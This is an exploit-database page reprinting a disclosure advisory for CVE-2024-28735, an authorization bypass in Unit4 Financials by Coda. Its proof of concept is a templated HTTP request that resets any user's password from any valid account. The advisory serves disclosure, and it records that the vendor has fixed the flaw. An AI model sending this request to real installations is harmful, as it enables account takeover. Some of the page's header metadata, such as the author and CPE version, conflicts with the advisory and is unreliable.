Advertisement






Financials By Coda Authorization Bypass

CVE Category Price Severity
CVE-2024-28735 CWE-284 $5000 Critical
Author Risk Exploitation Type Date
Security Researcher X Critical Remote 2024-03-16
CPE
cpe:/a:financials-coda:1.0.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.01234 0.75291

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030036

Below is a copy:

Financials By Coda Authorization Bypass
# Vulnerability type: Incorrect Access Control
# Vendor: https://www.unit4.com/
# Product: Financials by Coda
# Product site: https://www.unit4.com/fr/products/financial-management-software
# Affected version: < 2023Q4
# Fixed version: 2023Q4
# Credit: Lo DRAGHI
# CVE: CVE-2024-28735

# PROOF OF CONCEPT
The "Change Password" feature can be abused in order to modify the password of any user of the application.
The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.

POST /coda/rest/session/password HTTP/2
Host: <target>
<snip>

{
    "user" : "<targeted_user>",
    "password" : "<attacker_user_password>",
    "company" : "<company>",
    "newPassword" : "<new_password_for_targeted_user",
    "tzOffset" :240
}

# TIMELINE
 30/10/2023: Vulnerability found
 02/11/2023: Vendor informed
 05/12/2023: Vendor fixed the issue
 14/03/2024: Public disclosure

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.